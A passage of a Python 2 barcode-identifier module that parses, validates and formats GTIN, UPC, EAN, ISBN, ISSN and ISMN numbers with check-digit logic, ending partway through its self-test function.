pass
GTIN.__init__(self, s, **kw)
if self.gtin[:2] != '00':
raise ValueError('invalid literal for %s.%s(): %s' % (UPC12.__module__, UPC12.__name__, s))
pass
def __str__(self, short = False):
'''
Stringify a UPC A/EAN/UPC/EAN.UCC-12; the optional flag short = True omits the UPC prefix
'''
o = []
if not short: o.append('UPC ')
o.append(self.gtin[2:])
o.append(self.gtincheck)
return ''.join(o)
pass
class EAN8(GTIN):
'''
Handle EAN-8 as a wrapper class around GTIN
'''
def __init__(self, s, **kw):
if not isinstance(s, GTIN):
match = self.gtin_re.match(''.join(''.join(str(s).split()).split('-')))
if not match or not match.group('ean8'): raise ValueError('invalid literal for %s.%s(): %r' % (EAN8.__module__, EAN8.__name__, s))
pass
GTIN.__init__(self, s, **kw)
if self.gtin[:6] != '000000':
raise ValueError('invalid literal for %s.%s(): %s' % (EAN8.__module__, EAN8.__name__, s))
pass
def __str__(self, short = False):
'''
Strigify a EAN-8; the optional flag short = True omits the EAN prefix
'''
o = []
if not short: o.append('EAN ')
o.append(self.gtin[6:])
o.append(self.gtincheck)
return ''.join(o)
pass
upc8_re = re.compile(
r'''
\A
(?:
(?:UPC|U[.]P[.]C[.])(?:[- ]?[8E])?:?
[ ]?
)?
(?P<upc8>0\d{6,6})
(?P<upc8check>\d)
\Z
''',
re.VERBOSE | re.UNICODE | re.IGNORECASE)
def GTIN_from_UPC8(s, **kw):
'''
Return a GTIN object based on a UPC E/UPC-8 string.
Whitespace and hyphens are ignored on input.
'''
if isinstance(s, GTIN): s = GTIN_to_UPC8(s)
match = upc8_re.match(''.join(''.join(str(s).split()).split('-')))
if not match: raise ValueError('invalid literal for %s.%s(): %r' % (GTIN_from_UPC8.__module__, GTIN_from_UPC8.__name__, s))
upc8, upccheck = match.group('upc8'), match.group('upc8check')
if upc8[-1] in '012': upc = upc8[:3] + upc8[-1] + '0000' + upc8[3:6]
elif upc8[-1] == '3': upc = upc8[:4] + '00000' + upc8[4:6]
elif upc8[-1] == '4': upc = upc8[:5] + '00000' + upc8[5:6]
else: upc = upc8[:6] + '0000' + upc8[6:]
return GTIN(upc + upccheck, **kw)
def GTIN_to_UPC8(gtin, short = False, **kw):
'''
Return a UPC E/UPC-8 string based on a GTIN object; the optional flag short = True omits the UPC prefix
'''
if not isinstance(gtin, GTIN): gtin = GTIN(str(gtin), **kw)
gtin = GTIN.__str__(gtin, short = True)
if gtin[:3] != '000': raise ValueError('invalid literal for %s.%s(): %r (manufacturer number too large for zero suppression)' % (GTIN_to_UPC8.__module__, GTIN_to_UPC8.__name__, gtin))
prefix = (not short) and 'UPC ' or ''
if (gtin[5] in '012') and gtin[6:][:4] == '0000': return prefix + gtin[2:][:3] + gtin[-4:][:3] + gtin[5] + gtin[-1]
elif gtin[6:][:5] == '00000': return prefix + gtin[2:][:4] + gtin[-4:][:2] + '3' + gtin[-1]
elif gtin[7:][:5] == '00000': return prefix + gtin[2:][:5] + gtin[-4] + '4' + gtin[-1]
elif (gtin[12] in '56789') and gtin[8:][:4] == '0000': return prefix + gtin[2:][:6] + gtin[-2:]
raise ValueError('invalid literal for %s.%s(): %r (item number too large for zero suppression)' % (GTIN_to_UPC8.__module__, GTIN_to_UPC8.__name__, gtin))
class UPC8(GTIN):
'''
Handle UPC E/UPC-8 as a subset of GTIN.
'''
def __init__(self, s, **kw):
GTIN.__init__(self, GTIN_from_UPC8(s, **kw), **kw)
pass
__str__ = GTIN_to_UPC8
pass
isbn_re = re.compile(
r'''
\A
(?:
(?:ISBN|International[ ]?Standard[ ]?Book[ ]?Number)(?:-?13)?:?
[ ]?
)?
(?P<isbn13>
(?P<isbn13prefix0>978)[- ]?
(?:
(?P<isbn13group0>[02-7])[- ]?
(?:
(?P<isbn13publisher0>[01]\d)[- ]?(?P<isbn13item0>\d{6,6})
|
(?P<isbn13publisher2>[2-6]\d\d)[- ]?(?P<isbn13item2>\d{5,5})
|
(?P<isbn13publisher4>(?:7\d|8[0-4])\d\d)[- ]?(?P<isbn13item4>\d{4,4})
|
(?P<isbn13publisher6>8[5-9]\d\d\d)[- ]?(?P<isbn13item6>\d\d\d)
|
(?P<isbn13publisher8>9[0-4]\d{4,4})[- ]?(?P<isbn13item8>\d\d)
|
(?P<isbn13publisher10>9[5-9]\d{5,5})[- ]?(?P<isbn13item10>\d)
)
|
(?P<isbn13group1>1)[- ]?
(?:
(?P<isbn13publisher1>0\d)[- ]?(?P<isbn13item1>\d{6,6})
|
(?P<isbn13publisher3>[123]\d\d)[- ]?(?P<isbn13item3>\d{5,5})
|
(?P<isbn13publisher5>(?:4\d|5[0-4])\d\d)[- ]?(?P<isbn13item5>\d{4,4})
|
(?P<isbn13publisher7>(?:5[5-9]\d\d|[67]\d\d\d|8[0-5]\d\d|86[0-8]\d|869[0-7])\d)[- ]?(?P<isbn13item7>\d\d\d)
|
(?P<isbn13publisher9>(?:869[89]|8[789]\d\d|9[0-8]\d\d|99[0-8]\d)\d\d)[- ]?(?P<isbn13item9>\d\d)
|
(?P<isbn13publisher11>999\d{4,4})[- ]?(?P<isbn13item11>\d)
)
|
(?P<isbn13group12>(?:8\d|9[0-4]))[- ]?(?P<isbn13opaque12>\d{7,7})
|
(?P<isbn13group13>(?:95\d|9[6-8]\d|99[0-3]))[- ]?(?P<isbn13opaque13>\d{6,6})
|
(?P<isbn13group14>99[4-8]\d)[- ]?(?P<isbn13opaque14>\d{5,5})
|
(?P<isbn13group15>999\d\d)[- ]?(?P<isbn13opaque15>\d{4,4})
)
|
(?P<isbn13prefix16>979)[- ]?
(?:
(?P<isbn13group16>0)[- ]?
(?:
(?P<isbn13publisher16>0\d\d)[- ]?(?P<isbn13item16>\d{5,5})
|
(?P<isbn13publisher17>[1-3]\d\d\d)[- ]?(?P<isbn13item17>\d{4,4})
|
(?P<isbn13publisher18>[4-6]\d{4,4})[- ]?(?P<isbn13item18>\d\d\d)
|
(?P<isbn13publisher19>[78]\d{5,5})[- ]?(?P<isbn13item19>\d\d)
|
(?P<isbn13publisher20>9\d{6,6})[- ]?(?P<isbn13item20>\d)
)
|
(?P<isbn13opaque21>[1-9]\d{8,8})
)
)
(?P<isbn13check>\d)
|
(?:
(?:
(?:ISBN|International[ ]?Standard[ ]?Book[ ]?Number)(?:-?10)?:?
[ ]?
)?
(?P<isbn10>
(?P<isbn10group0>[02-7])[- ]?
(?:
(?P<isbn10publisher0>[01]\d)[- ]?(?P<isbn10item0>\d{6,6})
|
(?P<isbn10publisher2>[2-6]\d\d)[- ]?(?P<isbn10item2>\d{5,5})
|
(?P<isbn10publisher4>(?:7\d|8[0-4])\d\d)[- ]?(?P<isbn10item4>\d{4,4})
|
(?P<isbn10publisher6>8[5-9]\d\d\d)[- ]?(?P<isbn10item6>\d\d\d)
|
(?P<isbn10publisher8>9[0-4]\d{4,4})[- ]?(?P<isbn10item8>\d\d)
|
(?P<isbn10publisher10>9[5-9]\d{5,5})[- ]?(?P<isbn10item10>\d)
)
|
(?P<isbn10group1>1)[- ]?
(?:
(?P<isbn10publisher1>0\d)[- ]?(?P<isbn10item1>\d{6,6})
|
(?P<isbn10publisher3>[123]\d\d)[- ]?(?P<isbn10item3>\d{5,5})
|
(?P<isbn10publisher5>(?:4\d|5[0-4])\d\d)[- ]?(?P<isbn10item5>\d{4,4})
|
(?P<isbn10publisher7>(?:5[5-9]\d\d|[67]\d\d\d|8[0-5]\d\d|86[0-8]\d|869[0-7])\d)[- ]?(?P<isbn10item7>\d\d\d)
|
(?P<isbn10publisher9>(?:869[89]|8[789]\d\d|9[0-8]\d\d|99[0-8]\d)\d\d)[- ]?(?P<isbn10item9>\d\d)
|
(?P<isbn10publisher11>999\d{4,4})[- ]?(?P<isbn10item11>\d)
)
|
(?P<isbn10group12>(?:8\d|9[0-4]))[- ]?(?P<isbn10opaque12>\d{7,7})
|
(?P<isbn10group13>(?:9[5-8]\d|99[0-3]))[- ]?(?P<isbn10opaque13>\d{6,6})
|
(?P<isbn10group14>99[4-8]\d)[- ]?(?P<isbn10opaque14>\d{5,5})
|
(?P<isbn10group15>999\d\d)[- ]?(?P<isbn10opaque15>\d{4,4})
)
|
(?:
(?:SBN|Standard[ ]?Book[ ]?Number):?
[ ]?
)?
(?P<sbn>
(?P<sbnpublisher0>[01]\d)[- ]?(?P<sbnitem0>\d{6,6})
|
(?P<sbnpublisher2>[2-6]\d\d)[- ]?(?P<sbnitem2>\d{5,5})
|
(?P<sbnpublisher4>(?:7\d|8[0-4])\d\d)[- ]?(?P<sbnitem4>\d{4,4})
|
(?P<sbnpublisher6>8[5-9]\d\d\d)[- ]?(?P<sbnitem6>\d\d\d)
|
(?P<sbnpublisher8>9[0-4]\d{4,4})[- ]?(?P<sbnitem8>\d\d)
|
(?P<sbnpublisher10>9[5-9]\d{5,5})[- ]?(?P<sbnitem10>\d)
)
)
(?P<isbn10check>[0-9X])
\Z
''',
re.UNICODE | re.VERBOSE | re.IGNORECASE)
def GTIN_from_ISBN(s, **kw):
'''
Construct a GTIN from a ten-digit or thirteen-digit International
Standard Book Number (ISBN), ISO 2108. Older nine-digit Standard
Book Numbers (SBNs) are supported too. The ten-digit form is
sometimes referred to as ISBN-10 and the thirteet-digit form as
Bookland EAN/ISBN-13.
The optional parameter autocorrect = True corrects incorrect check
digits or check characters; if omitted, an incorrect check digit
or check character will raise a ValueError.
Allowed formats:
ISBN-13: 978xxxxxxxxxc
ISBN-13: 979xxxxxxxxxc
ISBN-10: xxxxxxxxxy
SBN: xxxxxxxxy
978xxxxxxxxxc
979xxxxxxxxxc
xxxxxxxxxy
xxxxxxxxy
NOTE: ISBN-10 or ISBN-13 may be abbreviated ISBN.
NOTE: (I)SBN may be spelled out in full as (International)
Standard Book Number.
NOTE: Case is not significant and whitespace and hyphens are ignored.
NOTE: The colon is optional.
NOTE: There is an unassigned/invalid range of ISBNs:
ISBN 978-6-xxxxxxxx-c,
a.k.a ISBN 6-xxxxxxxx-c-y,
Attempting to decode an ISBN in this range will result in a ValueError.
Where: x is a decimal digit,
y is a check character (0-9 or X) [checkPositionModulo],
and c is a decimal check digit [checkStandardModulo].
'''
if isinstance(s, GTIN): s = GTIN_to_ISBN(s, **kw)
match = isbn_re.match(''.join(''.join(s.split()).upper().split('-')))
if not match: raise ValueError('invalid literal for %s.%s(): %r' % (GTIN_from_ISBN.__module__, GTIN_from_ISBN.__name__, s))
isbn = (match.group('isbn13') or match.group('isbn10') or match.group('sbn')).zfill(9)
isbncheck = (match.group('isbn13check') or match.group('isbn10check') or match.group('sbncheck'))
if len(isbn) == 9:
check = 'X'.join(('%x' % checkPositionModulo(11, [ int(digit, 11) for digit in 'A'.join(isbn.split('X')) ])).upper().split('A'))
if kw.has_key('autocorrect') and kw['autocorrect']: isbncheck = check
if isbncheck != check:
raise ValueError('invalid check character for %s: %s' % (s, isbncheck))
ean = GTIN('978' + isbn + '0', autocorrect = True)
pass
else:
ean = isbn + isbncheck
pass
return GTIN(ean, **kw)
# FIXME: isbn13_override should be handled through assignment of a
# class alias instead...
# only change this while testing
isbn13_override = None
def GTIN_to_ISBN(gtin, short = False, isbn13 = None, **kw):
'''
Construct an International Standard Book Number (ISBN) from a
GTIN. If the optional flag isbn13 = True is provided, the result
is always in ISBN-13 format; if the optional flag isbn13 = False
is provided, the result will be in ISBN-10 format if possible; if
the optional flag isbn13 = None is provided, the system clock will
be checked and the effect will be equivalent to isbn13 = False
before 2007-01-01 and isbn13 = True from that day onward. The
optional flag short = True omits the "ISBN" prefix and hyphens.
NOTE: Hyphens are placed in the appropriate places between group,
publisher, and item in cases where these are known, and omitted
otherwise. The subset of ISBN-13 corresponding to Musicland (ISMN)
is hyphenated according to ISMN conventions.
Returned ISBN-10 formats when flag isbn13 is False:
ISBN x-xx-xxxxxx-y for ISBN range: [02-7]-[01]x-xxxxxx-y, 1-0x-xxxxxx-y
ISBN x-xxx-xxxxx-y for ISBN range: [02-7]-[2-6]xx-xxxxx-y, 1-[123]xx-xxxxx-y
ISBN x-xxxx-xxxx-y for ISBN range: [02-7]-(7x|8[0-4])xx-xxxx-y, 1-(4x|5[0-4])xx-xxxx-y
ISBN x-xxxxx-xxx-y for ISBN range: [02-7]-8[5-9]xxx-xxx-y, 1-(5[5-9]xx|[67]xxx|8[0-5]xx|86[0-8]x|869[0-7])x-xxx-y
ISBN x-xxxxxx-xx-y for ISBN range: [02-7]-9[0-4]xxxx-xx-y, 1-(869[89]|8[789]xx|9[0-8]xx|99[0-8]x)xx-xx-y
ISBN x-xxxxxxx-x-y for ISBN range: [02-7]-9[5-9]xxxxx-x-y, 1-999xxxx-x-y
ISBN xx-xxxxxxx-y for ISBN range: (8\d|9[0-4])-xxxxxxx-y
ISBN xxx-xxxxxx-y for ISBN range: (9[5-8]x|99[0-3])-xxxxxx-y
ISBN xxxx-xxxxx-y for ISBN range: 99[4-8]x-xxxxx-y
ISBN xxxxx-xxxx-y for ISBN range: 999xx-xxxx-y
Returned ISBN-13 formats when flag isbn13 is True:
ISBN 978-x-xx-xxxxxx-c for Bookland (ISBN) range: 978-[02-7]-[01]x-xxxxxx-c, 978-1-0x-xxxxxx-c
ISBN 978-x-xxx-xxxxx-c for Bookland (ISBN) range: 978-[02-7]-[2-6]xx-xxxxx-c, 978-1-[1-3]xx-xxxxx-c
ISBN 978-x-xxxx-xxxx-c for Bookland (ISBN) range: 978-[02-7]-(7x|8[0-4])xx-xxxx-c, 978-1-(4x|5[0-4])xx-xxxx-c
ISBN 978-x-xxxxx-xxx-c for Bookland (ISBN) range: 978-[02-7]-8[5-9]xxx-xxx-c, 978-1-(5[5-9]xx|[67]xxx|8[0-5]xx|86[0-8]x|869[0-7])x-xxx-c
ISBN 978-x-xxxxxx-xx-c for Bookland (ISBN) range: 978-[02-7]-9[0-4]xxxx-xx-c, 978-1-(869[89]|8[7-9]xx|9[0-8]xx|99[0-8]x)xx-xx-c
ISBN 978-x-xxxxxxx-x-c for Bookland (ISBN) range: 978-[02-7]-9[5-9]xxxxx-x-c, 978-1-999xxxx-x-c
ISBN 978-xx-xxxxxxx-c for Bookland (ISBN) range: 978-(8\d|9[0-4])-xxxxxxx-c
ISBN 978-xxx-xxxxxx-c for Bookland (ISBN) range: 978-(9[5-8]x|99[0-3])-xxxxxx-c
ISBN 978-xxxx-xxxxx-c for Bookland (ISBN) range: 978-99[4-8]x-xxxxx-c
ISBN 978-xxxxx-xxxx-c for Bookland (ISBN) range: 978-999xx-xxxx-c
Returned ISBN-13 formats:
ISBN 979-0-xxx-xxxxx-c for Musicland (ISMN) range 979-0-0xx-xxxxx-c
ISBN 979-0-xxxx-xxxx-c for Musicland (ISMN) range 979-0-[123]xxx-xxxx-c
ISBN 979-0-xxxxx-xxx-c for Musicland (ISMN) range 979-0-[456]xxxx-xxx-c
ISBN 979-0-xxxxxx-xx-c for Musicland (ISMN) range 979-0-[78]xxxxx-xx-c
ISBN 979-0-xxxxxxx-x-c for Musicland (ISMN) range 979-0-9xxxxxx-x-c
ISBN 979-xxxxxxxxx-c for Bookland (ISBN) range: 979-[1-9]xxxxxxxx-c
Where: x is a decimal digit,
y is a check character (0-9 or X) [checkPositionModulo],
and c is a decimal check digit [checkStandardModulo].
'''
if isbn13 is None: isbn13 = isbn13_override
if isbn13 is None: isbn13 = time.gmtime()[0] >= 2007
if not isinstance(gtin, GTIN): gtin = GTIN(str(gtin), **kw)
gtin = GTIN.__str__(gtin, short = True)
if gtin[:4] not in ('0978', '0979'):
raise ValueError('invalid literal for %s.%s(): %r' % (GTIN_to_ISBN.__module__, GTIN_to_ISBN.__name__, gtin))
if (gtin[:4] == '0978') and not isbn13:
isbn = gtin[4:][:-1]
isbn = 'ISBN ' + isbn + 'X'.join(('%x' % checkPositionModulo(11, [ int(digit, 11) for digit in 'A'.join(isbn.split('X')) ])).upper().split('A'))
else: isbn = 'ISBN ' + gtin[1:]
match = isbn_re.match(isbn)
assert match is not None
o = []
if not short: o.append('ISBN ')
parts = []
for variety in ('isbn13', 'isbn10', 'sbn'):
for partname in ('prefix', 'group', 'publisher', 'item', 'opaque', 'check'):
for key, value in match.groupdict().iteritems():
if key.startswith(variety + partname) and value is not None:
parts.append(value)
break
pass
pass
if len(parts): break
pass
o.append(((not short) and '-' or '').join(parts))
return ''.join(o)
class ISBN(GTIN):
'''
Handle ISBN as a subset of GTIN.
Not handled yet: five-digit price code extension a.k.a. "UPC5",
which are sometimes printed to the right of the EAN-13 barcode:
UPC-5 (a.k.a. EAN/5 or EAN/9) format:
daaaa>
Where: d is the currency code,
aaaaa is the amount,
and > is the optional "quiet zone" character
Examples:
0xxxx = Reserved (fromerly GBP xxxx)
00000 = No designated price (do not use)
1xxxx = USD 1xx.xx (formerly GBP xxxx)
2xxxx = USD 2xx.xx
3xxxx = USD 3xx.xx (formerly AUD xx.xx)
4xxxx = USD 4xx.xx (formerly NZD xx.xx)
5xxxx = USD xx.xx
50000 = No designated price (do not use)
59999 = Price exceeds USD 99.98 (manual entry)
6xxxx = Ignored (formerly CAD xx.xx)
7xxxx = Ignored
8xxxx = Ignored
90000-98999 = Internal use range
90000 = No price specified (BISG recommended)
99xxx = Reserved for special use
9999x = Reserved for National Association of College Stores (NACS)
99990 = NACS used books
99991 = NACS desk copies/complimentary
The barcode form encodes a UPC-like check digit (alternating
weights 3 9 3 9 3) in the parity of the digits.
In the ISBN format, the price is printed after the ISBN with two spaces:
ISBN 0-425-05382-2 2.75
'''
def __init__(self, s, **kw):
GTIN.__init__(self, GTIN_from_ISBN(s, **kw), **kw)
pass
__str__ = GTIN_to_ISBN
pass
issn_re = re.compile(
r'''
\A
ISSN:?
[ ]?
(?P<issn>
\d{4,4}-?\d\d\d
)
(?P<issncheck>[0-9X])
\Z
''',
re.UNICODE | re.VERBOSE | re.IGNORECASE)
def GTIN_from_ISSN(s, **kw):
'''
Construct a GTIN from an eight-digit International Standard Serial
Number (ISSN), ISO 3297.
The optional parameter autocorrect = True corrects incorrect check
characters; if omitted, an incorrect check character will raise a
ValueError.
Allowed format:
ISSN: xxxx-xxxy
NOTE: Case is not significant and whitespace and hyphens are ignored.
NOTE: The colon is optional.
Where: x is a decimal digit,
and y is a check character (0-9 or X) [checkPositionModulo].
'''
if isinstance(s, GTIN): s = GTIN_to_ISSN(s)
match = issn_re.match(''.join(''.join(s.split()).upper().split('-')))
if not match: raise ValueError('invalid literal for %s.%s(): %r' % (GTIN_from_ISSN.__module__, GTIN_from_ISSN.__name__, s))
issn = (match.group('issn')).zfill(7)
issncheck = match.group('issncheck')
check = 'X'.join(('%x' % checkPositionModulo(11, [ int(digit, 11) for digit in 'A'.join(issn.split('X')) ])).upper().split('A'))
if kw.has_key('autocorrect') and kw['autocorrect']: issncheck = check
if issncheck != check:
raise ValueError('invalid check character for %s: %s' % (s, issncheck))
kw['autocorrect'] = True
return GTIN('977' + issn + '000', **kw)
def GTIN_to_ISSN(gtin, short = False, **kw):
'''
Construct an International Standard Serial Number (ISSN) from a
GTIN. The optional flag short = True omits colon, space and hyphen.
Returned format (without flag short = True):
ISSN: xxxx-xxxy
Returned format (with flag short = True):
ISSNxxxxxxxy
Where: x is a decimal digit,
and y is a check character (0-9 or X) [checkPositionModulo].
'''
if not isinstance(gtin, GTIN): gtin = GTIN(str(gtin), **kw)
gtin = GTIN.__str__(gtin, short = True)
if gtin[:4] != '0977':
raise ValueError('invalid literal for %s.%s(): %r' % (GTIN_to_ISSN.__module__, GTIN_to_ISSN.__name__, gtin))
issn = gtin[4:][:-3]
prefix, hyphen = (not short) and ('ISSN: ', '-') or ('ISSN', '')
return prefix + issn[:4] + hyphen + issn[4:] + 'X'.join(('%x' % checkPositionModulo(11, [ int(digit, 11) for digit in 'A'.join(issn.split('X')) ])).upper().split('A'))
class ISSN(GTIN):
'''
Handle ISSN as a subset of GTIN.
Not implemented yet: two-digit price code, written in the EAN
right after the ISSN (currently fixed at 00); this is 00 for
normal issues, other values for special issues, double issues,
etc.
Not implemented yet: publication issue number, a two- or
five-digit add-on managed by the publisher, separated by a blank
space from the EAN (which format and what meaning to assign to it
varies by country.) For example, 03 might represent the March
issue (third month of the year) for a monthly periodical.
'''
def __init__(self, s, **kw):
GTIN.__init__(self, GTIN_from_ISSN(s, **kw), **kw)
pass
__str__ = GTIN_to_ISSN
pass
ismn_re = re.compile(
r'''
\A
(?:
(?:
(?:ISMN|International Standard Music Number)(?:-?10)?:?[ ]?
)?
(?P<prefix0>M)
|
(?:
(?:ISMN|International Standard Music Number)(?:-?13)?:?[ ]?
)?
(?P<prefix1>979[- ]?0)
)
[- ]?
(?P<ismn>
0\d\d[- ]?\d{5,5}
|
[1-3]\d\d\d[- ]?\d{4,4}
|
[4-6]\d{4,4}[- ]?\d\d\d
|
[78]\d{5,5}[- ]?\d\d
|
9\d{6,6}[- ]?\d
)
[- ]?
(?P<ismncheck>\d)
\Z
''',
re.UNICODE | re.VERBOSE | re.IGNORECASE)
ismn_publisher_length = [ 3, 4, 4, 4, 5, 5, 5, 6, 6, 7 ]
def GTIN_from_ISMN(s, **kw):
'''
Construct a GTIN from an eight-digit International Standard Music
Number (ISMN), ISO 10957. Supports both the current 10-character
ISMNs (ISMN-10) and the proposed 13-character EAN.UCC "Musicland"
ISMNs (ISMN-13).
The optional parameter autocorrect = True corrects incorrect check
characters; if omitted, an incorrect check character will raise a
ValueError.
Allowed formats:
ISMN M-321-76543-6
ISMN 979-0-123-45678-3
|___| |_| |___| |
P P I C
R U T H
E B E E
F L M C
I I K
X S
H D
E I
R G
I
T
NOTE: ISMN may be spelled out in full as International Standard
Music Number.
NOTE: Case is not significant and whitespace and hyphens are
interchangeable and optional.
NOTE: A colon is allowed after ISMN on input but not generated on
output.
NOTE: The publisher and item are variable-length but combined they
are always eight digits. The length of the publisher portion
depends on the first digit as follows:
0: 3 digits
1, 2, 3: 4 digits
4, 5, 6: 5 digits
7, 8: 6 digits
9: 7 digits
'''
if isinstance(s, GTIN): s = GTIN_to_ISMN(s)
match = ismn_re.match(''.join(''.join(s.upper().split()).split('-')))
if not match: raise ValueError('invalid literal for %s.%s(): %r' % (GTIN_from_ISMN.__module__, GTIN_from_ISMN.__name__, s))
prefix = (match.group('prefix0') or match.group('prefix1')).upper()
ismn = ''.join(''.join(match.group('ismn').split()).split('-'))
split = ismn_publisher_length[int(ismn[0])]
publisher, item = ismn[:split], ismn[split:]
ismncheck = match.group('ismncheck')
digits = '3' + ismn
check = str(checkStandardModulo(10, [ int(digit) for digit in digits ]))
if kw.has_key('autocorrect') and kw['autocorrect']: ismncheck = check
if ismncheck != check:
raise ValueError('invalid check character for %s: %s' % (s, ismncheck))
ean = '9790' + ismn + ismncheck
return GTIN(ean, **kw)
def GTIN_to_ISMN(gtin, short = False, **kw):
'''
Construct an International Standard Serial Number (ISMN) from a
GTIN. The optional flag short = True omits the ISMN prefix and
hyphens.
0: 3 digits
1, 2, 3: 4 digits
4, 5, 6: 5 digits
7, 8: 6 digits
9: 7 digits
Returned formats (without short = True):
ISMN M-xxx-xxxxx-c
ISMN M-xxxx-xxxx-c
ISMN M-xxxxx-xxx-c
ISMN M-xxxxxx-xx-c
ISMN M-xxxxxxx-x-c
Returned formats (with short = True):
Mxxxxxxxxc
Where: x is a decimal digit,
and c is a decimal check digit [checkStandardModulo].
'''
if not isinstance(gtin, GTIN): gtin = GTIN(str(gtin), **kw)
gtin = GTIN.__str__(gtin, short = True)
if gtin[:5] != '09790':
raise ValueError('invalid literal for %s.%s(): %r' % (GTIN_to_ISMN.__module__, GTIN_to_ISMN.__name__, gtin))
ismn, ismncheck = gtin[5:-1], gtin[-1]
split = ismn_publisher_length[int(ismn[0])]
publisher, item = ismn[:split], ismn[split:]
prefix, hyphen = (not short) and ('ISMN ', '-') or ('', '')
return prefix + 'M' + hyphen + publisher + hyphen + item + hyphen + ismncheck
class ISMN(GTIN):
'''
Handle ISMN as a subset of GTIN.
'''
def __init__(self, s, **kw):
GTIN.__init__(self, GTIN_from_ISMN(s, **kw), **kw)
pass
__str__ = GTIN_to_ISMN
pass
def test():
'''
Self-tests for the GTIN module
'''
# test the standard modulo check digit calculator (positive tests)
for base, digits, ck in (
# UPC/UCC-12
(10, '61414121022- ', 0),
# EAN/UCC-13
(10, '101454121022- ', 3),
# EAN/UCC-14
(10, '9101454121022- ', 6),
# SSCC
(10, '10614141192837465- ', 7),
(10, '37610425002123456- ', 9),
# BoL
(10, '0614141192837465- ', 0),
# EAN/UCC-8
(10, '4321012- ', 1),
):
try: assert checkStandardModulo(base, [ int(digit, 10) for digit in ''.join(''.join(digits.split()).split('-')) ]) == ck
except:
print 'checkStandardModulo failed for:'
print ' base =', base
print ' digits =', digits
print ' ck =', ck
raise
pass
# test the MOD a,b check digit calculator (negative tests)
for base, digits, ck in (
# UPC/UCC-12
(10, '61414121022- ', 1),
# EAN/UCC-13
(10, '101454121022- ', 0),
# EAN/UCC-14
(10, '9101454121022- ', 4),
# SSCC
(10, '10614141192837465- ', 3),
# BoL
(10, '0614141192837465- ', 9),
# EAN/UCC-8
(10, '4321012- ', 2),
):
try: assert checkStandardModulo(base, [ int(digit, 10) for digit in ''.join(''.join(digits.split()).split('-')) ]) != ck
except:
print 'checkStandardModulo failed for:'
print ' base =', base
print ' digits =', digits
print ' ck =', ck
raise
pass
# test the GTIN constructor (positive tests)
for s in (
'011594022019',
'00614141210220',
'01014541210223',
'91014541210226',
'00000043210121',
'614141210220',
'1014541210223',
'43210121',
'50285549',
'0 48500 00102 8',
'978-0-11-000222-4',
):
try: GTIN(s)
except:
print 'GTIN failed for s =', s
raise
pass
# test the GTIN constructor (negative tests)
for s in (
'00614141210221',
'01014541210220',
'91014541210224',
'00000043210122',
'614141210221',
'1014541210220',
'43210122',
'000614141210220',
'0001014541210223',
'00091014541210226',
'000000000043210121',
'106141411928374657',
'06141411928374650',
'106141411928374653',
'06141411928374659',
'9786000000004',
'81014541210229',
):
try: GTIN(s)
except ValueError, v: pass
else:
print 'GTIN should have failed for s =', s
assert False
pass
pass
# test the GTIN constructor and the GTIN str() implementation
assert str(GTIN('91014541210226')) == '91014541210226'
assert GTIN('91014541210226').__str__(short = True) == '91014541210226'
assert str(GTIN('01014541210223')) == '01014541210223'
assert GTIN('01014541210223').__str__(short = True) == '01014541210223'
assert str(GTIN('00614141210220')) == '00614141210220'
assert GTIN('00614141210220').__str__(short = True) == '00614141210220'
assert str(GTIN('00000043210121')) == '00000043210121'
assert GTIN('00000043210121').__str__(short = True) == '00000043210121'
assert str(GTIN( '1014541210223')) == '01014541210223'
assert GTIN( '1014541210223').__str__(short = True) == '01014541210223'
assert str(GTIN( '614141210220')) == '00614141210220'
assert GTIN( '614141210220').__str__(short = True) == '00614141210220'
assert str(GTIN( '43210121')) == '00000043210121'
assert GTIN( '43210121').__str__(short = True) == '00000043210121'
# test the EAN14, EAN13, UPC12, and EAN8 wrapper classes
assert str(EAN14('91014541210226')) == 'EAN 91014541210226'
assert EAN14('91014541210226').__str__(short = True) == '91014541210226'
assert str(EAN13( '1014541210223')) == 'EAN 1014541210223'
assert EAN13( '1014541210223').__str__(short = True) == '1014541210223'
assert str(UPC12( '614141210220')) == 'UPC 614141210220'
assert UPC12( '614141210220').__str__(short = True) == '614141210220'
assert str( EAN8( '43210121')) == 'EAN 43210121'
assert EAN8( '43210121').__str__(short = True) == '43210121'
assert str(EAN14('EAN 91014541210226')) == 'EAN 91014541210226'
assert EAN14('EAN 91014541210226').__str__(short = True) == '91014541210226'
assert str(EAN13( 'EAN 1014541210223')) == 'EAN 1014541210223'
assert EAN13( 'EAN 1014541210223').__str__(short = True) == '1014541210223'
assert str(UPC12( 'UPC 614141210220')) == 'UPC 614141210220'
assert UPC12( 'UPC 614141210220').__str__(short = True) == '614141210220'
assert str( EAN8( 'EAN 43210121')) == 'EAN 43210121'
assert EAN8( 'EAN 43210121').__str__(short = True) == '43210121'
# test the GTIN comparison implementation
assert GTIN('91014541210226') == GTIN('91014541210226')
assert GTIN('01014541210223') == GTIN('01014541210223')
assert GTIN('00614141210220') == GTIN('00614141210220')
assert GTIN('00000043210121') == GTIN('00000043210121')
assert GTIN( '1014541210223') == GTIN('01014541210223')
assert GTIN( '614141210220') == GTIN('00614141210220')
assert GTIN( '43210121') == GTIN('00000043210121')
assert GTIN( '43210122', autocorrect = True) == GTIN('00000043210121')
assert GTIN('91014541210226') > GTIN('01014541210223')
assert GTIN('00000043210121') < GTIN('00614141210220')
assert GTIN( '1014541210223') != GTIN('00614141210220')
# test the GTIN check character autocorrection feature, stringification, and comparison
for r, s in (
('91014541210226', '91014541210224'),
('01014541210223', '01014541210220'),
('00614141210220', '00614141210221'),
('00000043210121', '00000043210122'),
):
assert GTIN(r) == GTIN(s, autocorrect = True)
assert str(GTIN(r)) == str(GTIN(s, autocorrect = True))
assert GTIN(r).__str__(short = True) == GTIN(s, autocorrect = True).__str__(short = True)
pass
# make sure comparisons between GTINs and non-GTINs raise a TypeError
try:
tmp = GTIN('91014541210226') != '91014541210226'
assert tmp;
except TypeError, t: pass
else: raise RuntimeError('comparison between GTIN and string should not work')
try:
tmp = '01014541210223' != GTIN('01014541210223')
assert tmp
except TypeError, t: pass
else: raise RuntimeError('comparison between GTIN and string should not work')
# test accessors
i = GTIN('01014541210223')
assert i.gtin == '0101454121022'
assert i.gtincheck == '3'
# test whitespace and hyphen removal
assert GTIN('0 48500 00102 8') == GTIN('00048500001028')
# test UPC E/UPC-8 conversion
assert GTIN_from_UPC8('01987913') == GTIN('00019100008793')
assert GTIN_to_UPC8(GTIN('00019100008793')) == 'UPC 01987913'
# test the UPC8 wrapper class
assert UPC8('01987913') == GTIN('00019100008793')
assert UPC8('UPC 01987913') == GTIN('00019100008793')
